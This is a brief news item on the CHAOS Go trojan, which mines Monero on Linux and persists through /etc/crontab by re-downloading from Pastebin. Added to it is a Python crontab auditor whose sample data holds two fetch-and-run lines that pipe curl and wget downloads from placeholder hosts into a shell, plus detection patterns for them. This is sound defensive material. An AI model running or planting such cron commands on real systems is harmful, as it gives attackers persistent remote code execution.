A new Go malware called CHAOS is hitting Linux users in a crypto mining campaign.
The CHAOS Trojan was discovered by Trend Micro in November 2022. A distinguishing feature of the malware is that it kills other cryptominers and deploys its own, which is used to mine Monero.
According to the researchers, CHAOS achieves persistence by modifying the file /etc/crontab (crontab is a special file that contains a schedule of tasks that the cron task scheduler will run), so that it is re-downloaded from Pastebin every 10 minutes.
At this point, the payload is loaded, consisting of the XMRig miner and the CHAOS Go trojan. The main loader script and subsequent payloads are stored in multiple locations, making the campaign much harder to stop.
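The crontab persistence described above can be checked for directly. The following Python script is an added example, not code from Trend Micro or from the original article: it audits system-crontab text for entries that fetch remote content, and records the repeat interval, whether the download is piped to a shell, and whether the host is a paste site. The sample crontab, its URL and its IP address are constructed placeholders, and the function names are hypothetical.

```python
import re

# Constructed sample of /etc/crontab content (placeholders, not campaign data).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
0 3 * * * backup /usr/local/bin/backup.sh
*/10 * * * * root (wget -q -O- http://198.51.100.7/l.sh || true) | bash
"""

FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*?(https?://[^\s'\"|;)]+)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|da|z)?sh\b")
PASTE_HOSTS = ("pastebin.com",)  # assumption: extend with other paste services


def minute_interval(field):
    """Return N for a '*/N' minute field, else None."""
    m = re.fullmatch(r"\*/(\d+)", field)
    return int(m.group(1)) if m else None


def audit_crontab(text):
    """Return findings for system-crontab entries that fetch remote content."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue  # blank line, comment, or environment assignment
        parts = line.split(None, 6)  # 5 time fields + user + command
        fetch = FETCH.search(parts[6]) if len(parts) == 7 else None
        if not fetch:
            continue
        url = fetch.group(2)
        host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()
        reasons = ["remote fetch"]
        if PIPE_TO_SHELL.search(parts[6]):
            reasons.append("piped to shell")
        if any(host == h or host.endswith("." + h) for h in PASTE_HOSTS):
            reasons.append("paste site")
        findings.append({"line": lineno, "user": parts[5], "url": url,
                         "every_min": minute_interval(parts[0]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding)
```

On a live host, pass the contents of /etc/crontab and the files under /etc/cron.d to audit_crontab; per-user crontabs have no user column and need a six-field split instead.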
After downloading and launching, CHAOS transmits metadata about the victim's system to the attacker's server, and also provides hackers with the following functionality:
Interaction with files;
Creation of screenshots;
Shutting down / restarting the computer;
Opening arbitrary URLs.
Experts warn that hacks are getting more and more sophisticated, so companies and consumers alike need to stay vigilant about their cybersecurity.